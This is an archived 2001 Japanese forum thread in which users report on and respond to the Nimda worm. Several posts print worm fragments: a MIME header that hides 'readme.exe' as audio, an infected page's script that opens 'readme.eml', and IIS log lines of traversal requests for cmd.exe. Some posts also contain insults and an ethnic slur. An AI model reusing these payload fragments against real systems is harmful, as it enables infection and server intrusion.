女子大もあったし、暇だったんで事務所に電話しちゃった。
カワイ声したオバチャン、ヨカタよ。

297 :名無しさん@お腹いっぱい。:01/09/19 21:04
>>294
ダイアルアップでどう?

298 : :01/09/19 21:05
desktop.emlってのがあったよ。中身はreadme.emlだった

299 :名無しさん@お腹いっぱい。:01/09/19 21:05
おいおい、ノートン、もうアップデートが出てるよ。

昼にアップしたばっかりなのに。

300 :名無しさん@お腹いっぱい。:01/09/19 21:09
ヘンに心配するぐらいなら
素直にフォーマットして再インストールしろよ

301 :名無しさん@お腹いっぱい。:01/09/19 21:10
ウィルスバスターもね♪

302 :名無しさん@お腹いっぱい。:01/09/19 21:12
>297
ダイアルアップでも自分の付近のIPにアタックかけちゃうと思う。

303 :名無しさん@お腹いっぱい。:01/09/19 21:13
>>288
さっき SP2 に上げたんだが、バージョン情報曰く
5.00.3315.1000
更新バージョン: SP2
だとさ。ほんま大丈夫なんかいな。

304 :名無しさん@お腹いっぱい。:01/09/19 21:13
@ITがアクセスできなかったのはNimdaのせいだったのねーん。
http://www.atmarkit.co.jp/aboutus/aftercare/aftercare/aftercare.html

305 :名無しさん@お腹いっぱい。:01/09/19 21:16
>>299
俺もアップデートしたよ
なんか連発してるねこの頃

306 :名無しさん@お腹いっぱい。:01/09/19 21:16
ノートンがw32.Nimda.A@mm(dr)
に感染しています。

このファイルは検疫しました。

大丈夫でしょうか?

307 :名無しさん@お腹いっぱい。:01/09/19 21:17
で、みんなんとこはどのくらいアクセスが来てる?
うちは今日今までで3667件だね。昨日は775件だった。
その前の日まではCodeRedが平均で100件くらいだったんだけどね。

308 :名無しさん@お腹いっぱい。:01/09/19 21:22
>>306
とりあえずシマンテックに送ってあげたら?

309 :名無しさん@お腹いっぱい。:01/09/19 21:23
>>307
ルータータイプのADSLモデムにしてから、ノートン君のログはゼロ。
なんだか、さみしい。

310 :名無しさん@お腹いっぱい。:01/09/19 21:26
>>306
隔離されているということだから大丈夫。
俺なんか、記念にいろんなウイルス10個ほど保存してある。
もちろん、検疫(隔離状態)されています。

311 :名無しさん@お腹いっぱい。:01/09/19 21:28
>>308

マイクロトレンドにも送ってあげたら?(w

312 :名無しさん@お腹いっぱい。:01/09/19 21:28
うちの会社もやられたみたい。。。
詳しい事は解らないけど3時からメールもWEBも使えなかった。。。

313 :(´Д`;):01/09/19 21:29
イヤイヤ、こんな簡単に最新ワーム君、感染サイトからゲトできるとは。
ちゃんとパチ当てとけば慌てる必要ないのにね。
去年3月だよ。。マイ糞、不正MIMEヘッダのパチ出してたの。。。。
サムプル攻撃コード、バグの発見者が同時に公開してた時点でヤヴァイと
はオモたけど。。まさか春先のバグ使ったウイルスが今時こんな騒ぎにな
るとは。
破壊ルーチン組んでないのは、感染広げるためかな。
トラフィク増大して、鯖のゴミログ増えると不正アクセスしやすいんだろ
うね。流した張本人にはキト。テロが流したか、アンチが流したか、チョソ
かな。

314 :名無しさん@お腹いっぱい。:01/09/19 21:31
>>309

その状態で>>278行ったらどうなります?

315 :   :01/09/19 21:33
>>314
まだ>>278そのまんまなんだな、、、
いいかげんにしろよ

316 :名無しさん@お腹いっぱい。:01/09/19 21:33
>>313
どうでもいいけど、わざと読みにくくして楽しいか?

317 :実行ファイルに埋め込まれちゃったよん:01/09/19 21:36
System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

(中略)

c: readme main index default html .asp .htm
\readme.eml .exe mep winzip32.exe
riched20.dll .nws .eml .doc .exe
(略)
\readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe
\riched20.dll boot Shell explorer.exe load.exe -dontrunold
\system.ini \load.exe \\ octet

後半部分のファイル名、拡張子を使ってるやつに色々細工するんだろうね。

318 :名無しさん@お腹いっぱい。:01/09/19 21:37
>>315

いまたぶんこのガッコ無人と思われ・・。

319 :名無しさん@お腹いっぱい。:01/09/19 21:39
>>317

> 後半部分のファイル名、拡張子を使ってるやつに色々細工するんだろうね。

でしょうね。
と、いうかバイナリエディタとかでこの部分いろいろ改造して流すヤツも出て来るんだろうね。

にむだ.b とか .c とかって。

320 :309:01/09/19 21:41
>>314
278ってニムダ感染サイト?
そうだったら、他サイト踏んでみたが、
ノートンアンチ君が警告だしたよ。「危険なコードが含まれています」だって。

321 :名無しさん@お腹いっぱい。:01/09/19 21:43
 あの、geocities.com のトップ以外のユーザー個別のページがすべて感染してるんですけど・・・・・・。
 すごいことになってるような・・・・・・。

322 :名無しさん@お腹いっぱい。:01/09/19 21:45
>>320

なるほど〜。そりゃ踏めば警告でますよね。

厨質でスマソ、ルータータイプのADSLモデムだと、アタックを受けないよ、ってわけ?

323 :    :01/09/19 21:47
>>321
つながんないよ、トップも

324 :名無しさん@お腹いっぱい。:01/09/19 21:47
>>321

ガ━━(゚Д゚;)━━ン

おれそこに頁おいてた・・。

325 :313:01/09/19 21:47
>>316
いや、独り言に近いんで、、、、スマヌ。
ただ、アンチウイルスソフトだけに頼るのがいかに危険かって言いたかった。
バグ/フィクス情報の方が重要な事多い。
http://www.microsoft.com/japan/technet/security/current.asp
↑今後のためにもココはマメに見とくべき。気休めだけど。
新しいの出たら、説明良く見て当てる事。>感染しちゃった人

326 :名無しさん@お腹いっぱい。:01/09/19 21:48
>>325

> http://www.microsoft.com/japan/technet/security/current.asp
> ↑今後のためにもココはマメに見とくべき。気休めだけど。
> 新しいの出たら、説明良く見て当てる事。>感染しちゃった人

・・・ここは感染してないよね?(^^;

327 :名無しさん@お腹いっぱい。:01/09/19 21:49
http://www.geocities.com/jumptocoollyrics/newsongs.html
http://www.geocities.com/loverlands/webmasters.html
http://www.geocities.com/shorty690322/extra_income.html
とか。
対策してない人は開かないでください。またはJavaScriptを切る。

328 :名無しさん@お腹いっぱい。:01/09/19 21:49
大事なファイルを守りたい人は、LHAまたはZIPで圧縮かけておけば
いいんじゃないでしょうか。
私はhtmlファイルをいつもZIPで圧縮してで保存していたため、
htmlファイルが書き換えられるという被害にはあいませんでした。

329 :名無しさん@お腹いっぱい:01/09/19 21:50
マカーは大丈夫よね?

330 :名無しさん@お腹いっぱい。:01/09/19 21:51
ZIPもいじられるって、どこかに書いてなかったっけ?

331 :ハァ…:01/09/19 21:51
サーバはCodeRedの件があったのでなんとか大丈夫だったけど
クライアントはほぼ全滅。
アンチウイルスソフト入れてるのに切ってたりパターン
ファイルを更新してなかったり・・・
勝手に設定変えるなボグェ!!!!!!!!!!!!!!
つーか俺管理者じゃ無いのに何でこんな事やってるんだろ…(涙

332 :名無しさん@お腹いっぱい。:01/09/19 21:53
と、いうか感染したら具体的にどんな不具合があるの?
イマイチ分からんのだが

333 :名無しさん@お腹いっぱい。:01/09/19 21:53
http://geocities.yahoo.com/
から
下の Business & Finance とか、たどっていくと・・・・・・。
すべてに[Nimda Killed]が出る(Proxomitron用の手製の Nimda フィルター)。

334 :名無しさん@お腹いっぱい。:01/09/19 21:55
IE4は大丈夫なの?
使ってるブラウザがNN4.5で、IE4の入ってるマシンです。
先ほどかけた段階ではなにも入ってませんでした。

335 :名無しさん@お腹いっぱい。:01/09/19 21:55
>>332
他人のマシンを手当たり次第、ありとあらゆる方法で侵入を試みる。
それだけ。

336 : :01/09/19 21:56
>>327

感染してないぞ

337 :名無しさん@お腹いっぱい。:01/09/19 21:58
ブラウザ使わないで、かちゅ〜しゃ使って、2ちゃん見てるだけだったら感染しない?
(人として問題があるのはわかってる)

338 :名無しさん@お腹いっぱい。:01/09/19 21:59
広告で自動挿入されるスクリプトまでウィルスだと思ってるのでわ?

339 :名無しさん@お腹いっぱい。:01/09/19 22:00
>>329

何をもって大丈夫というのか知らんが、感染ファイルはゲットできるぞ。

しかもMacのウイルスチェッカは無警告ときたもんだ。

340 :名無しさん@お腹いっぱい。:01/09/19 22:00
>>335
ん?つまり、自分が踏み台になるって事?

341 :名無しさん@お腹いっぱい。:01/09/19 22:01
>>339

ういるすファイル収集して飼うならMacだな(藁

342 :名無しさん@お腹いっぱい。:01/09/19 22:06
>>340
ワームだから踏み台じゃない。
単に増殖するだけだよ。

343 :名無しさん@お腹いっぱい。:01/09/19 22:06
5.00.3315.1000
更新バージョン: SP2

5.01の.01は上のどの部分に当たるのでしょうか。
痛い質問ですいません。

344 :309:01/09/19 22:07
>>322
モデムのルーター機能の中で、NAT機能ってもんがあるので、
結果的に不正侵入を防ぐことになっているんだそうだ。
これで、完璧なわけではなく無いよりはあったほうが、
セキュリティが向上するみたい。
言わば、門番を立たせているようなもんです。

345 :名無しさん@お腹いっぱい。:01/09/19 22:07
>>333
それは君の正規表現が誤検知してるのと違うの?

346 :名無しさん@お腹いっぱい。:01/09/19 22:09
321の母でございます…

347 :ナナシサソ:01/09/19 22:09
>>330
ここ
http://www.hotwired.co.jp/news/news/technology/story/20010919301.html

348 :名無しさん@お腹いっぱい。:01/09/19 22:10
>>343
それ多分5.01のことだと思う

349 :ナナシサソ:01/09/19 22:11
>>343
そういう問題ではないような。。。

InternetExplorerのバージョンを確かめましょう
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000324.htm
ここに一覧があるけど、あんまカンケーないみたい。。。(w

350 :名無しさん@お腹いっぱい。:01/09/19 22:15
>>343

おれもこれだ。

っていうか、他のヤツにきかれたときこれが5.01だ、ってどういったら納得してもらえるんだ?

351 :名無しさんに接続中…:01/09/19 22:17
オリコの野郎、まだワームばら撒いてるぜ!(藁
ネットワーク管理者は何やっとる!
www01.orico.co.jp - - [19/Sep/2001:18:30:54 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

352 :343:01/09/19 22:19
>>349
ピンポイントのレス、ありがとうございます。

353 :名無しさん@お腹いっぱい。:01/09/19 22:21
CodeRed
 ↓
繁殖活動を行いつつ、時期が来るとホワイトハウスに対しDDoS

CodeRedII
 ↓
オリジナル以上の感染力と、バックドアで世界中のIISを食い物に

Nimda
 ↓
様々な感染方法で、IISサーバーだけでなく、クライアントマシンも狙う

?????(次回作)
 ↓
世界中のIISサーバーとクライアントWindowsマシンに
バックドアをしこみ、繁殖活動も行いつつ、1時間おきとか
定期的にWindowsUpdateのサーバー、MicrosoftTechNetの
サーバーにDDoS

こんなんになったらお手上げですな

354 :ナナシサソ:01/09/19 22:24
>>353
やめて。。。コワイカラ。。。

355 : :01/09/19 22:24
簡便してくれよ>MS・・・

356 :名無しさん@お腹いっぱい。:01/09/19 22:25
ブラクラチェックみたいに感染したサイトを検知ってできないのかな?

357 :名無しさん@お腹いっぱい。:01/09/19 22:26
しかしゴいねこのニムダっての
1日で二千回以上喰らってるよ (;´Д`)ヒー

358 :名無しさん@お腹いっぱい。:01/09/19 22:26
>>355

安易な簡便が、勘弁な事態を・・。

359 :名無しさん@お腹いっぱい。:01/09/19 22:27
やれそうな気はするけど・・・。

自分には無理だが(w

360 :名無しさん@お腹いっぱい。:01/09/19 22:31
感染しておいて他人事かよ・・。

http://www.mainichi.co.jp/digital/flash/010919-1.html

361 :名無しさん@お腹いっぱい。:01/09/19 22:35
そのうちMSは訴えられるぞ・・・

362 :名無しさん@お腹いっぱい。:01/09/19 22:35
MOONブラウザとかのタブ型ブラウザは大丈夫でしょうか?
一応IE6入れてます。

363 :名無しさん@お腹いっぱい。:01/09/19 22:37
くそっ!今日はNimdaのせいで仕事にならんかったよ。
朝9時に仕事場についたら手遅れだったよ。
すでに数台発症してた(涙)
ネットワークはパケットの台風が吹き荒れ
同一フロア数十台のPCがフォルダ共有していたため、
あやしいeml.tmp.exe.dllファイルが出るわ出るわ。

364 :名無しさん@お腹いっぱい。:01/09/19 22:38
アホウな質問かもしれませんが・・・・

ネスケはかんせんしますか?

365 :名無しさん@お腹いっぱい。:01/09/19 22:38
>>362
IEのコンポーネントをつかったブラウザ、メーラーは危ない。
でもIE自体が6とか、パッチ当たってるならOK

366 :だから:01/09/19 22:39
>>362&質問君
今まで出てきたウィルスやワームの対策を見てみ。
対策されてりゃにむだなんて怖くないの。

367 :名無しさん@お腹いっぱい。:01/09/19 22:39
今、ログ見たらすごい事に(w

ところで *.*.ed.jpってなんだっけ。

368 :名無しさん@お腹いっぱい。:01/09/19 22:40
>>365
安心しました。ありがとう。

369 :名無しさん@お腹いっぱい。:01/09/19 22:40
おいおい、昼ごろのパラメータでスキャンして安心してたら、夕方のでスキャンし直すとまたぞろみつかるぞ。<ノートン

370 :(´Д`;):01/09/19 22:41
だ・か・ら、取り敢えず、
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
↑MS01-020当てとけって。。。クライアント君。
↓ウイルス情報良く見なさい。何処の穴心配すれば良いか。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
ブラウザのバージョン・SPのバージョン調べるより早いぞ。

CODE-REDのMS00-078塞いでない糞鯖の糞管理者なんかシラネーよ。

371 :名無しさん@お腹いっぱい。:01/09/19 22:41
>>366

ありゃ?漏れはW2k SP2なのにニムダのバックドアがいるぞ?
同然IEも5.01SP2だ。

いまSP2にしたんじゃない、一ヶ月以上前だ・・。

知られていない感染経路があるのか?

372 :名無しさん@お腹いっぱい。:01/09/19 22:42
>>367
教育機関だっけ。専門学校とか?

373 :名無しさん@お腹いっぱい。:01/09/19 22:44
>>372

私立の小中学校とかは?

公立は地域ドメインだよね。

374 :だから:01/09/19 22:44
SP2&パッチ。

375 : :01/09/19 22:45
IE6β使ってたら、感染した

376 :名無しさん@お腹いっぱい。:01/09/19 22:46
SP2&パッチって変な言い方だな。

SP2、もしくは SP1+パッチだろ

377 :名無しさん@お腹いっぱい。:01/09/19 22:47
>370
すんませんsp1も当てていなかったヘタレなので
MS01-020を当てられませぬ…

378 :名無しさん@お腹いっぱい。:01/09/19 22:47
b. [ネットワーク名] SEIRYO-NET
f. [組織名] 国際交流研究会

感染(w

ワームで国際交流(・∀・)イイ!!

379 :名無しさん@お腹いっぱい。:01/09/19 22:47
>>371
特定のIRCクライアントからも感染するらしい。

380 :名無しさん@お腹いっぱい。:01/09/19 22:48
MSにはもううんざり・・・

381 :だから:01/09/19 22:49
だった。SP1+ぱっち
ネットから切断した状態で当ててなかったかだな。

382 :>>371:01/09/19 22:55
パッチしようとしてダウンしたら当てる必要ねえぞゴルァって(´Д`)

383 :名無しさん@お腹いっぱい。:01/09/19 22:58
>>361
慣れてるだろ・・・

384 :名無しさん@お腹いっぱい:01/09/19 22:58
一応VB2001がインストールされていて、かつ最新のウィルス定
義ファイルをさっきダウンロードした。
上記の条件でIE5.5使ってる俺の下記の認識はあってるかな?

1.SP1すら入れてないので容量の少ないパッチだけではだめだ。
2.よって容量のでかいSP2を入れる必要がある。
3.でかいファイルを落とすのは面倒なのでやらない。とりあえ
 ずVB2001でNimdaを凌ぐことに決定。

どう?

385 :名無しさん@お腹いっぱい。:01/09/19 22:58
未だにウチの会社はパニック中
感染したWin98のレジストリは、どう直しています?

386 :名無しさん@お腹いっぱい。:01/09/19 22:58
おうちに帰りたいよー。

387 :名無しさん@お腹いっぱい。:01/09/19 22:59
>>385
再インストールしないとダメです。

388 :名無しさん@お腹いっぱい。:01/09/19 23:01
>>385
再インストール決定かどうかはまだわからん。
修正プログラムが出るのを待つしかないが、とりあえず
レジストリだけなら数日前のものに復元って手もあるな

389 :名無しさん@お腹いっぱい。:01/09/19 23:01
ドライブ丸ごと共有出してる事自体がアホなんですがね。
改心せいやー

390 :名無しさん@お腹いっぱい。:01/09/19 23:01
おかしくねえか?

この対策ってCodeRedのときと同じだろう?

クライアントはともかく、WebSiteがなんでこんなに感染しているんだ?

391 :370:01/09/19 23:02
げっ、Unicodeのバグ使ってんの、確かコードブルーだった。

392 :ビギナー:01/09/19 23:02
ここ読んで怖くなりました。
さっそくIE5.5SP2にして、ノートンLiveUpDateして、
そしてこれからはずっとスクリプトオフにしてネットやります。
面倒だけどしかたないですね。

393 :ほね:01/09/19 23:03
ソース解析やってる人居る?
年・月・日を見てるんだけど、これ何やってるんだろ?

394 :名無しさん@お腹いっぱい。:01/09/19 23:03
>>390
いや、CodeRedよりもいろいろと穴をつくんで・・・

395 :めるめる:01/09/19 23:04
感染しちゃいました♪
すごいアタック数ですね・・・・
どんどん増えてる・・・・

396 :名無しさん@お腹いっぱい:01/09/19 23:04
>>390
確かに。事実なら少なくともMSNが感染するのはおかしいよな。

397 :名無しさん@お腹いっぱい。:01/09/19 23:04
>>393
あれ、ソース出てたの?それとも逆アセンブルしてんの?

398 : :01/09/19 23:04
マックで良かったハアハア

399 :名無しさん@お腹いっぱい。:01/09/19 23:04
>>387
まじっすか!?受け持ちだけで・・あ〜ああ。

シマンテック 朝のから更新されているよね・・・
あ〜もう手動でやったことばっかりだな
レジストリのこと触れていないなあ

400 :名無しさん@お腹いっぱい。:01/09/19 23:04
>>387

漏れはW2Kだったけど、CodeRedのときは、再インストールではだめで、WinNTフォルダごとごっちょり消して生HDDにインストールしたWinNTフォルダのイメージをコピーした。

401 :名無しさん@お腹いっぱい。:01/09/19 23:05
ニュースステーションに出たね。
財務省もやられたとか。

402 :名無しさん@お腹いっぱい。:01/09/19 23:05
まだ発見されてないバックドアありそう・・・

403 :名無しさん@お腹いっぱい。:01/09/19 23:05
>>390
マヌケがこんなに多いとは・・
これが現実か?
MSに文句言う前にパッチ等はあてろや ゴラァ

404 :めるめる:01/09/19 23:06
これって感染したマシンがIPをランダムにスキャンしてるんですか?
セキュリティが弱いIPを発見した場合に感染ですか?・・・。

405 :名無しさん@お腹いっぱい。:01/09/19 23:07
>>399
いや、だからレジストリだけならscanregで数日前のものにリストアしろや

406 :370:01/09/19 23:07
結局、http/80が大穴だと。。。クライアントもサーバも。

407 :名無しさん@お腹いっぱい。:01/09/19 23:07
もう、新しいフォルダが勝手に作られて
勝手に共有されて・・・笑いが止まりません

408 :ほね:01/09/19 23:07
>>397
逆汗です。
SourcerとSoftICEが欲しいナリね。
有事期間限定版とか出してくれないかな・・・

409 :名無しさん@お腹いっぱい。:01/09/19 23:07
>>399

スキャン過程みている限り、まだレジストリの対策はなにもできていないと思われ。

夕方のパラメータでもチェックから漏れているファイルがあるような。

410 :名無しさん@お腹いっぱい。:01/09/19 23:09
クライアントさんがバシバシ再起動してくださったので
残っていません<数日前のレジストリ

411 :名無しさん@お腹いっぱい。:01/09/19 23:11
感染したPCはネットワークから切り離して
対策プログラム待ちするのがベストかなー。
ただいま数台放置プレイ中(w

412 :>>371 :01/09/19 23:11
>>402
>まだ発見されてないバックドアありそう・・・

漏れの見た状況をみる限りそうとしか思えない。

そもそも、このウイルスの作者が既知のセキュリティーバグ「だけ」しか利用していないという保証もない。

疑惑だけど、SP2にさらにセキュリティーバグがあるか、未知のホールを突いてないか?

413 :名無しさん@お腹いっぱい。:01/09/19 23:13
javascriptをオフにしていてもソースを見て
emlファイルにアクセスしても感染するのでしょうか?

414 :名無しさん@お腹いっぱい。:01/09/19 23:13
>>412
あるかもねー。

昨日の時点で共有フォルダやられるの知ってたら
何台か救えたのに。うぅぅ

415 :名無しさん@お腹いっぱい。:01/09/19 23:13
電子メール経由で感染したマシンから
ローカルでWEBサーバに感染したんじゃないの?

416 :名無しさん@お腹いっぱい。:01/09/19 23:13
>>410
VMwareのバーチャルマシンにWin98入れて、Regmonとかで
レジストリを監視させといてreadme.exe起動して見れば?

もしくはノーマル状態のレジストリをあらかじめファイルに
書き出しといてから、readme.exe実行して、それもファイルに
書き出して差分を見るとか

417 :名無しさん@お腹いっぱい。:01/09/19 23:14
うちは、該当ファイルを手動で削除、んで、最新のウィルスソフトで
削除して、system.ini から削除して・・・

全社食らったので、ネットワークって何!?じょうたいですね。

レジストリは当面放置して、明日またゴミデータ増殖していたら
明日は休業ですね。

418 :名無しさん@お腹いっぱい。:01/09/19 23:16
添付ファイルを不用意に開けるセキュリティーホールを
埋めるパッチ出せ。>>MS

419 :名無しさん@お腹いっぱい。:01/09/19 23:17
>>410
サンクス、その方法もやってみます

サーバーは1年前のまで取ってあるんだけどね〜

420 :めるめる:01/09/19 23:17
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-19 14:09:59
#Fields: time c-ip cs-method cs-uri-stem sc-status
14:09:59 211.202.10.83 GET /default.ida 200
14:12:51 211.210.93.19 GET /default.ida 200
14:16:10 211.49.90.14 GET /default.ida 200
14:19:21 211.207.8.21 GET /default.ida 200
14:20:45 211.115.196.215 GET /scripts/root.exe 404
14:20:45 211.115.196.215 GET /MSADC/root.exe 404
14:20:47 211.115.196.215 GET /c/winnt/system32/cmd.exe 404
14:20:47 211.115.196.215 GET /d/winnt/system32/cmd.exe 404
14:20:49 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:49 211.115.196.215 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:20:51 211.115.196.215 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:20:51 211.115.196.215 GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500
14:20:53 211.115.196.215 GET /scripts/..チ../winnt/system32/cmd.exe 404
14:20:53 211.115.196.215 GET /scripts/winnt/system32/cmd.exe 404
14:20:55 211.115.196.215 GET /scripts/../../winnt/system32/cmd.exe 404
14:20:55 211.115.196.215 GET /scripts/..\../winnt/system32/cmd.exe 404
14:20:57 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:57 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:58 211.115.196.215 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:20:58 211.115.196.215 GET /scripts/..%2f../winnt/system32/cmd.exe 404
14:24:27 211.189.161.194 GET /scripts/root.exe 404
14:24:29 211.189.161.194 GET /MSADC/root.exe 404
14:24:31 211.189.161.194 GET /c/winnt/system32/cmd.exe 404
14:24:32 211.189.161.194 GET /d/winnt/system32/cmd.exe 404
14:24:34 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:35 211.189.161.194 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:24:37 211.189.161.194 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:24:38 211.189.161.194 GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500
14:24:38 211.189.161.194 GET /scripts/..チ../winnt/system32/cmd.exe 404
14:24:40 211.189.161.194 GET /scripts/winnt/system32/cmd.exe 404
14:24:42 211.189.161.194 GET /scripts/../../winnt/system32/cmd.exe 404
14:24:43 211.189.161.194 GET /scripts/..\../winnt/system32/cmd.exe 404
14:24:45 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:46 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:48 211.189.161.194 GET /scripts/..%5c../winnt/system32/cmd.exe 404
14:24:50 211.189.161.194 GET /scripts/..%2f../winnt/system32/cmd.exe 404
どういうこと???

421 :名無しさん@お腹いっぱい。:01/09/19 23:18
MSに賠償金請求できないかなぁ・・・

422 :名無しさん@お腹いっぱい。:01/09/19 23:18
感染しました。WIN98SE IE5.5更新0
ADSLルータモデムでNAT機能を利用しての接続です。

>64のサイト
ソースが
<html>
<body bgcolor=black>
<br><br><br><br><br><br>
<table width=100%><td>
<p align="center">
<font size=7 color=red>fuck USA Government</font>
<tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td>
<p align="center">
<font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>

<html>
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
</html>

だったのでjavascriptを切って訪れたのですが。
感染源が違うのかも?と思って、
アンチウィルスにより修復後、再度他にも考えうる限りの
セキュリティを切ってみてアクセスしてもまた感染しました。

自業自得だけどガ━━(゚Д゚;)━━ン!

423 :名無しさん@お腹いっぱい。:01/09/19 23:19
>>420
14:24:38 211.189.161.194 GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500

500・・・?

424 :初心者:01/09/19 23:19
感染すると壁紙を含めwebの画像が表示されなくなるとかいうのはありますかね?

425 :名無しさん@お腹いっぱい。:01/09/19 23:20
>>418

んだ。.emlファイルを許可無く開けなくしろ。

426 :名無しさん@お腹いっぱい。:01/09/19 23:22
>>420

404なんだからいいよ
俺なんか200で持ってかれちゃったよ

427 :名無しさん@お腹いっぱい。:01/09/19 23:24
>>424
ウチではありません。
ただ、自己増殖中にうんざりメモリーくってシステムそのものが
物凄く晩くなったりします。当然表示も。
久しぶりに走査線の順に表示されるのを見ましたから

あと、増殖中に桜時計がやたらと時間を合わせ様と(?)アクセスを
開始してました。

428 :名無しさん@お腹いっぱい。:01/09/19 23:24
IE系のタブブラウザでも影響受けるのかな?
とりあえずSP2で凌いでるけど。

429 :名無しさん@お腹いっぱい。:01/09/19 23:26
感染したらどうしてりゃいいの?
接続切って?ほいで????

430 :名無しさん@お腹いっぱい:01/09/19 23:27
>>429
粗大ごみの日に表に出しとく。

431 :W32:01/09/19 23:28
420みたいなログってどうやってみるの?
どうやったら感染がわかるの?

432 :名無しさん@お腹いっぱい。:01/09/19 23:28
Cドライブ共有してると、デスクトップにメールが
直接届くのにはワラタよ

433 :名無しさん@お腹いっぱい。:01/09/19 23:28
>>430
それを俺が拾う

434 :ナナシサソ:01/09/19 23:28
>>428>>429
ここでも読んでおきなさい。
一応たいていの情報は集まってる。
http://keisui.com/GIGAZINE/cgi-bin/news/html/newsbav.html

435 :>>429:01/09/19 23:30
回線切って首つって氏ね

とりあえずネットに繋がないようにすれば周りにまき散らさないからイインジャネーノ?

436 :名無しさん@お腹いっぱい。:01/09/19 23:30
NHKよくやった。

437 :名無しさん@お腹いっぱい。:01/09/19 23:31
>436
NHKがなにやったの?

438 :名無しさん@お腹いっぱい。:01/09/19 23:31
>>435
ネットに繋がないで、自分のマシンの中で
暴れるのを楽しむのに一票(w

439 :名無しさん@お腹いっぱい。:01/09/19 23:33
>>432
ネットワーク共有フォルダがあると各階層に漏れなくメールとDLLと
その数分のtmp.exeがプレゼントされます。

440 :431:01/09/19 23:33
頼む!教えてくれ( ̄人 ̄)

441 :>>371:01/09/19 23:34
>>427

> あと、増殖中に桜時計がやたらと時間を合わせ様と(?)アクセスを
> 開始してました。

なんかネット的に再接続しまくるみたいですね。ノートンのインターネットセキュリティー入れてたけど、mmc.exeの接続許可を何度も求められた。

442 :ナナシサソ:01/09/19 23:34
>>440
鯖立てなさい(w

443 :(´Д`;):01/09/19 23:34
>>418
出てるって。上ミロyo-!
MS01-020
ちなみに、有る感染鯖から落したreadme.eml同じmimeヘッダ使ってた。
Content-Type: audio/x-wav;
name="readme.exe"
コレは発見当初と同じ穴。

444 :>>371:01/09/19 23:35
>>432

お、おおお。おお・・。

445 :名無しさん@お腹いっぱい。:01/09/19 23:35
>>440
鯖は立ててるの?

446 :440:01/09/19 23:35
あ、鯖立てないと見れないのか・・・
Meじゃ無理ですね残念。。。
感染してるか心配じゃ〜。
>>442さんありがとう

447 :名無しさん@お腹いっぱい。:01/09/19 23:38
>>440
あなたに鯖なんてすぎた代物です。
アホ鯖立てて迷惑かけないように。

448 :名無しさん@お腹いっぱい。:01/09/19 23:38
>>439
そうそうご丁寧に1フォルダ1セットずつおいてくよなー。
なんかまめな奴

449 :名無しさん@お腹いっぱい。:01/09/19 23:40
おちおちネットサーフィソもできやしない・・・。

450 :名無しさん@お腹いっぱい。:01/09/19 23:41
逆アセンブルしてたら、なにげな〜くプロセス実行
しようとしてた。あぶね〜(汗 もう今日は寝よう。
会社のマシンにパッチ当てまくって疲れたし・・・

451 :名無しさん@お腹いっぱい。:01/09/19 23:41
ウチのファイルサーバLinuxなんだが
システム本体はすっとぼけていたが、共有フォルダは
笑えるほどのメールが・・・
 NASにいたっては40Gの空間が・・・大笑いさ( ´Д`;)

452 :名無しさん@お腹いっぱい。:01/09/19 23:41
いいかげんIIS使う奴が減ってくれれば・・・

453 :名無しさん@お腹いっぱい。:01/09/19 23:41
テレ東でウィルス情報やるですよー。CM明け

454 :名無しさん@お腹いっぱい。:01/09/19 23:43
>>443
「初心者が」って意味だったんだが。分かりにくかった。
すまん。

455 :名無しさん@お腹いっぱい。:01/09/19 23:43
・・・これだけかよ(笑)

456 :名無しさん@お腹いっぱい。:01/09/19 23:44
>>451

てこたぁ、マカもWeb公開するフォルダを共有してたら踏み台になれるってこと?

457 :名無しさん@お腹いっぱい。:01/09/19 23:44
>>423

Error500 サーバーエラー。CGI周りで出ることあるよ。

458 :いつかの510:01/09/19 23:45
↓見てみれ。感染サイト数増えてるぞ。

http://search.fresheye.com/?kw=readme.eml&term=monthly

対策してないヤツは、見てもいいが、リンクはふむなよ!

459 :名無しさん@お腹いっぱい。:01/09/19 23:45
